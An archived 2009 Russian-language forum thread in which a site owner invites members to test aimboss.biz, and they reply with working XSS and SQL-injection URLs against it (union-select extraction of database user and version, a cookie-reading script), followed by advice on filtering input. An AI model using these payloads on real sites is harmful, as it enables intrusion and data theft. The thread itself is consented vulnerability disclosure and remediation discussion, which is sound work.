PDA

Просмотр полной версии : aimboss.biz


DECIDE
22.06.2009, 10:49
Пожалуйста проверьте мой сайт на уязвимости
если необходимо начислю кредитов и опишу возможности которых очень много и нужно всё отладить
Заранее спасибо!

BlackSun
22.06.2009, 11:17
Пассивная XSS
http://aimboss.biz/?nvg=/user:<script>alert()</script>
http://aimboss.biz/?nvg=s-jsip:pinfo:</title></head><body><img src=.+onerror=alert()><!--
http://aimboss.biz/?nvg=t:message:"><script>alert()</script><!--

SQL-INJ
http://aimboss.biz/?nvg=/user::-1+union+select+concat_ws(0x3a,user(),version()),2, 3+--+
http://aimboss.biz/?nvg=weblog:pages:1,1,4,-1'+OR+1=1+--+
http://aimboss.biz/?nvg=s-jsip:pinfo:-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(), version()),8+--+

wildshaman
22.06.2009, 11:20
Пассивка:
http://aimboss.biz/?nvg=casino:rally:run"><script>alert()</script>

по-моему, она там везде :)

DECIDE
22.06.2009, 11:55
спасибо, буду исправлять
ЗЫ. а как сделали столько много.. в онлайне?

BlackSun: хз, побочные эффекты

это понятно что это только цветочки.., главное что указали на то как не стоит делать, и что надо фильтровать Get запросы

BlackSun: фильровать надо всё, _GET, _POST, _COOKIE, _FILES, и тп. Все данные от пользователей.

BlackSun
22.06.2009, 12:21
Продолжу в этом посте ..

SQL-INJ, http://aimboss.biz/?nvg=!site:z:usr
В поле ник:
%' union select 1,concat_ws(0x3a,user(),version()),3,4 -- -
Вывод в последней записи

http://aimboss.biz/?nvg=t:vfile:-1'+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion())+--+

nemaniak
22.06.2009, 12:26
Вот еще парочка...
http://aimboss.biz/?nvg=weblog:myblogs:-211+union+select+1,2,3,4,concat_ws(char(58),user() ,database(),version()),6,7,8,9,10,11,12,13,14--

http://aimboss.biz/?nvg=weblog:<script>alert()</script>

вообщем все баги идентичны

BlackSun
22.06.2009, 12:36
Короче, думаю дальше уже нет смысла копать, идите на полную доработку, фильтрации нет вообще нигде. Потом уже действительно на проверку.

DECIDE
22.06.2009, 12:43
как лучше производить фильтрацию?
от JS
strip_tags()
а от SQL-INJ
как можно обезопасится?

сегодня-завтра постараюсь всё исправить и надеюсь на дельнейшую помошь в поиске уязвимостей

ЗЫ. ещё как сделали столько много в онлайне, что именно делалось? такого не должно быть чтобы один и тотже пользователь выводился более 200 раз в онлайне..

BlackSun
22.06.2009, 12:50
addslashes(), inval(), маны по пыху в помошь. Есстественно, если в параметре может быть только число, то лучше использовать intval(), а не addslashes.

ЗЫ. ещё как сделали столько много в онлайне, что именно делалось? такого не должно быть чтобы один и тотже пользователь выводился более 200 раз в онлайне..
Оно как то само))

DECIDE
22.06.2009, 14:21
что даст addslashes()?
думаю бесполезная функция в данном случае

BlackSun
22.06.2009, 14:40
что даст addslashes()?
думаю бесполезная функция в данном случае
addslashes экранирует кавычки.

DECIDE
22.06.2009, 17:01
это понятно что экранирует
но надписи всё равно останутся на страничке, надо полностю исключить появления подобного эффекта, а не только экранировать выполнение инъекции ИМХО
поэтому желательно полностю отфильтровать, а не просто экранировать кавычки

DECIDE
22.06.2009, 18:28
поставил фильтр, прошу посмотреть ещё какие могут быть уязвимости

BlackSun
22.06.2009, 19:01
Рекомендую посмотреть в сторону PHP IDS - http://php-ids.org/ по тестам, хорошая система для зашиты скриптов.

DECIDE
22.06.2009, 19:10
BlackSun, мы вообще-то русские люди, подобного на русском нет?

ЗЫ. и что за привычка посылать как футболист футболит мяч не умеющий играть..

Adm1n4eG
22.06.2009, 20:13
Пассивная XSS
http://aimboss.biz/?kin=1<script>alert(document.cookie)</script>

DECIDE
22.06.2009, 20:38
спасибо, исправил :)

DECIDE
23.06.2009, 16:29
кто нибудь ещё что нибудь может найти?
сайт очень большой, дыр наверняка ещё очень много

DECIDE
24.06.2009, 15:16
почему тишина? разве нет больше уязвимостей?
скажите свои ники я вам начислю кредитов и вы посмотрите как работает биржа, форум, панель заказов и др.
не хочется когда начнём запускать проект снова узнавать что есть баги..

DECIDE
27.06.2009, 08:08
в соседней теме увидел
Через SQL-иньекцию найти пароли от phpmyadmin, которые ты не спрятал, и от туда залить шелл.
Найти пассы через SQL-иньекцию от админики и через админку залить шелл.
такое откровение :)

возник вопрос какими командами можно через инекцию узнать пароли от phpmyadmin?